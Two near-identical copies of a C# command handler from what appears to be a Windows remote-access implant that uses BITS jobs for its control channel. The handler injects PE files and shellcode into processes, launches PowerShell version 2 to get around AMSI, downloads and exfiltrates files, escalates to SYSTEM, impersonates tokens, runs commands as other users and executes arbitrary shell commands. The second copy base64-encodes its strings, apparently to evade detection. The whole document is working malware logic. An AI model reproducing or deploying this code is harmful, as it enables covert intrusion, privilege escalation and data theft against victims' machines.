Example #1
0
        private void DoSomething(Content file)
        {
            var rps = "";

            try
            {
                switch (file.Commands[0])
                {
                case "inject_pe":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        try
                        {
                            var pe     = LoadPE(fileP);
                            var method = file.Commands[1];
                            var args   = "";

                            for (var i = 2; i < file.Commands.Length; i++)
                            {
                                args += file.Commands[i];
                                if (i < file.Commands.Length)
                                {
                                    args += " ";
                                }
                            }

                            var arguments = new string[] { args };

                            LauncherPE.Main(method, arguments, pe);
                            rps = "PE injected!";
                        }
                        catch (Exception)
                        {
                            rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:Dll not found!\n";
                    }

                    break;
                }

                case "inject_shellcode":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                    var pid     = -1;
                    if (file.Commands.Length >= 2)
                    {
                        pid = int.Parse(file.Commands[1]);
                    }

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        byte[] sh;
                        GetEncryptedFileContent(fileP, out sh);

                        try
                        {
                            LauncherShellCode.Main(sh, _sysCall, pid);
                            rps = "Shellcode injected!\n";
                        }
                        catch (Exception)
                        {
                            rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:Shellcode file not found!\n";
                    }

                    break;
                }

                case "powershell":
                {
                    rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");

                    if (rps.Contains("hi"))
                    {
                        LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                        rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                    }
                    else
                    {
                        rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
                    }

                    break;
                }

                case "send":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        File.Copy(fileP, file.Commands[1], true);
                        rps = "Dowload finished.\n";
                    }
                    else
                    {
                        rps = "ERR:Download failed!\n";
                    }

                    break;
                }

                case "exfiltrate":
                {
                    if (File.Exists(file.Commands[1]))
                    {
                        if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                        {
                            rps = "Exfiltration succeed.\n";
                        }
                        else
                        {
                            rps = "ERR:Exfiltration failed!\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:File to exfiltrate not found!\n";
                    }

                    break;
                }

                case "getsystem":
                {
                    if (Utils.IsHighIntegrity(_sysCall))
                    {
                        rps = _tokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
                    }
                    else
                    {
                        rps = "ERR:Process failed! Is this process running with high integrity level?\n";
                    }

                    break;
                }

                case "rev2self":
                {
                    TokenManager.Rev2Self();
                    rps = "Welcome back.\n";

                    break;
                }

                case "runas":
                {
                    string user = "", domain = "", password = "";
                    var    userData = file.Commands[1].Split('\\');

                    if (userData.Length == 1)
                    {
                        domain = ".";
                        user   = userData[0];
                    }
                    else
                    {
                        domain = userData[0];
                        user   = userData[1];
                    }

                    password = file.Commands[2];

                    rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";

                    break;
                }

                case "list":
                {
                    rps = GetProcessInfo();
                    break;
                }

                case "impersonate":
                {
                    try
                    {
                        if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
                        {
                            rps = "Impersonation achieved!\n";
                        }
                        else
                        {
                            rps = "ERR: Not enough privileges!\n";
                        }
                    }
                    catch
                    {
                        rps = "ERR: Impersonation failed!\n";
                    }

                    break;
                }

                case "exit":
                {
                    Environment.Exit(0);
                    break;
                }

                default:
                {
                    rps = Utils.ExecuteCommand(file.Commands[0]);
                    break;
                }
                }
            }
            catch
            {
                rps = "ERR: Something went wrong!";
            }

            var response = new Response(rps, _auth);
            var filePath = _tempPath + @"\" + _id + ".txt";

            EncryptResponseIntoFile(filePath, response);
            TrySend(filePath);
        }
Example #2
0
        private void DoSomething(Content file)
        {
            var rps = "";

            try
            {
                switch (file.Commands[0])
                {
                case "inject_pe":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        try
                        {
                            var pe     = LoadPE(fileP);
                            var method = file.Commands[1];
                            var args   = "";

                            for (var i = 2; i < file.Commands.Length; i++)
                            {
                                args += file.Commands[i];
                                if (i < file.Commands.Length)
                                {
                                    args += " ";
                                }
                            }

                            var arguments = new string[] { args };

                            LauncherPE.Main(method, arguments, pe);
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("UEUgaW5qZWN0ZWQh"));
                        }
                        catch (Exception)
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIGRsbC4="));
                        }
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRsbCBub3QgZm91bmQh"));
                    }

                    break;
                }

                case "inject_shellcode":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
                    var pid     = -1;
                    if (file.Commands.Length >= 2)
                    {
                        pid = int.Parse(file.Commands[1]);
                    }

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        byte[] sh;
                        GetEncryptedFileContent(fileP, out sh);

                        try
                        {
                            LauncherShellCode.Main(sh, _sysCall, pid);
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("U2hlbGxjb2RlIGluamVjdGVkIQ=="));
                        }
                        catch (Exception)
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIHNoZWxsY29kZS4="));
                        }
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlNoZWxsY29kZSBmaWxlIG5vdCBmb3VuZCE="));
                    }

                    break;
                }

                case "powershell":
                {
                    rps = Utils.ExecuteCommand(Encoding.UTF8.GetString(Convert.FromBase64String("cG93ZXJzaGVsbCAtViAyIC9DIFdyaXRlLUhvc3QgaGk=")), _sysCall);

                    if (rps.Contains("hi"))
                    {
                        LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("WW91IHNob3VsZCBoYXZlIHlvdXIgUG93ZXJzaGVsbCBhdCA=")) + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String(
                                                          "VmVyc2lvbiAyIG9mIFBvd2Vyc2hlbGwgbm90IGF2YWlsYWJsZS4gVHJ5IGluamVjdGluZyB" +
                                                          "FdmlsU2Fsc2EgYnkgQ3liZXJWYWNhIGluIG9yZGVyIHRvIHVzZSBwb3dlcnNoZWxsIHdpdGhvdXQgYW0=")) + "si.\n";
                    }

                    break;
                }

                case "send":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        File.Copy(fileP, file.Commands[1], true);
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RG93bG9hZCBmaW5pc2hlZC4="));
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRvd25sb2FkIGZhaWxlZCE="));
                    }

                    break;
                }

                case "exfiltrate":
                {
                    if (File.Exists(file.Commands[1]))
                    {
                        if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("RXhmaWx0cmF0aW9uIHN1Y2NlZWQu"));
                        }
                        else
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkV4ZmlsdHJhdGlvbiBmYWlsZWQh"));
                        }
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZpbGUgdG8gZXhmaWx0cmF0ZSBub3QgZm91bmQh"));
                    }

                    break;
                }

                case "getsystem":
                {
                    if (Utils.IsHighIntegrity(_sysCall))
                    {
                        rps = _tokenManager.GetSystem(_sysCall) ? Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSE=")) :
                              Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSFcbkVS" +
                                                                               "UjpQcm9jZXNzIGZhaWxlZCEgSXMgdGhpcyBwcm9jZXNzIHJ1bm5pbmcgd2l0aCBoaWdoIGludGVncml0eSBsZXZlbD8="));
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlByb2Nlc3MgZmFpbGVkISBJcyB0aGlzIHByb2Nlc3MgcnVubmluZyB3aXRoIGhpZ2ggaW50ZWdyaXR5IGxldmVsPw=="));
                    }

                    break;
                }

                case "rev2self":
                {
                    TokenManager.Rev2Self();
                    rps = "Welcome back.\n";

                    break;
                }

                case "runas":
                {
                    string user = "", domain = "", password = "";
                    var    userData = file.Commands[1].Split('\\');

                    if (userData.Length == 1)
                    {
                        domain = ".";
                        user   = userData[0];
                    }
                    else
                    {
                        domain = userData[0];
                        user   = userData[1];
                    }

                    password = file.Commands[2];

                    rps = TokenManager.RunAs(domain, user, password) ? "Success!" : Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkludmFsaWQgY3JlZGVudGlhbHMu"));

                    break;
                }

                case "list":
                {
                    rps = GetProcessInfo();
                    break;
                }

                case "impersonate":
                {
                    try
                    {
                        if (_tokenManager.Impersonate(int.Parse(file.Commands[1]), _sysCall))
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("SW1wZXJzb25hdGlvbiBhY2hpZXZlZCE="));
                        }
                        else
                        {
                            rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBOb3QgZW5vdWdoIHByaXZpbGVnZXMh"));
                        }
                    }
                    catch
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBJbXBlcnNvbmF0aW9uIGZhaWxlZCE="));
                    }

                    break;
                }

                case "exit":
                {
                    Environment.Exit(0);
                    break;
                }

                default:
                {
                    rps = Utils.ExecuteCommand(file.Commands[0], _sysCall);
                    break;
                }
                }
            }
            catch
            {
                rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBTb21ldGhpbmcgd2VudCB3cm9uZyE="));
            }

            var response = new Response(rps, _auth);
            var filePath = _tempPath + @"\" + _id + ".txt";

            EncryptResponseIntoFile(filePath, response);
            TrySend(filePath);
        }